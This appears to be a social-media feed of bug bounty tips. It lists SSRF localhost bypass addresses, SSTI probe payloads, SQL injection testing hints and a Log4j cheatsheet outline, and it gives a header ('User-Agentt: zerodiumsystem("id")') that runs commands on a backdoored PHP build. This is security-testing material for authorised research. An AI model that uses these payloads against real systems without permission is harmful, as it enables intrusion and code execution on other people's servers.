Anton
6,086 posts
Bug Bounty Tips | AI · LLM · Dev · Games @rcemandev
- Bug Bounty Tip :: Log4j Vulnerability Cheatsheet
  🔹 How It Works
  🔹 Test Environments
  🔹 Challenges & Labs (Rooms)
  🔹 Where Payloads can be Injected
  🔹 What Information can be Extracted
  🔹 How To Identify (Services & Scanners)
- Bug Bounty Tip
  List of localhost addresses for SSRF bypass
  🔹 http://localhost
  🔹 http://127.1
  🔹 http://127.0.0.0
  🔹 http://127.0.0.1
  🔹 http://2130706433
  🔹 http://0177.1
  🔹 http://0x7f.1
  🔹 http://127.000.000.1
  🔹 http://localtest .me
  🔹 http://[::1]
  🔹 http://[::]
  Cheers!
- Bug Bounty Hint
  How to test for SQL injection
  1) Select params for testing in:
  🔹 URL query
  🔹 POST body
  🔹 Headers
  🔹 Cookies
  It can be any parameter. Typically, I test integer parameters first.
  🧵 1/8
- Bug Bounty Info GitHub Recon using GitHub Dorks 📖 Article shahjerry33.medium.com/github-recon-i… #CyberSecurity #cybersecuritytips #Hacking #BugBounty #bugbountytip #infosec #hacker #togetherwehitharder #bugcrowd #hack #hackers #hackerone
- Top 28 CyberSecurity Games Sharpen Your Bug Bounty Skills Credits to Morgan Hamlin
- Bug Bounty Tip
  SSTI (Server Side Template Injection) Payload List
  🔹 {7*7}
  🔹 *{7*7}
  🔹 {{7*7}}
  🔹 [[7*7]]
  🔹 ${7*7}
  🔹 @(7*7)
  🔹 <?=7*7?>
  🔹 <%= 7*7 %>
  🔹 ${= 7*7}
  🔹 {{= 7*7}}
  🔹 ${{7*7}}
  🔹 #{7*7}
  🔹 [=7*7]
  If evaluated as 49 - the target is vulnerable
  Cheers!
- Bug Bounty Hint
  If you have found that a server is running PHP - you can try to test it for an RCE vulnerability.
  Append the following header to the request:
  User-Agentt: zerodiumsystem("id")
  If the PHP version is vulnerable - you will execute the system("id") command on the server.
- I believe the time has come to collect all my bug bounty tips and tricks into a PDF book.
- Bug Bounty Tip
  The best place to check for SQL injection is the Order By clause in query / body params.
  Example: orderby=asc,(SQL PAYLOAD)












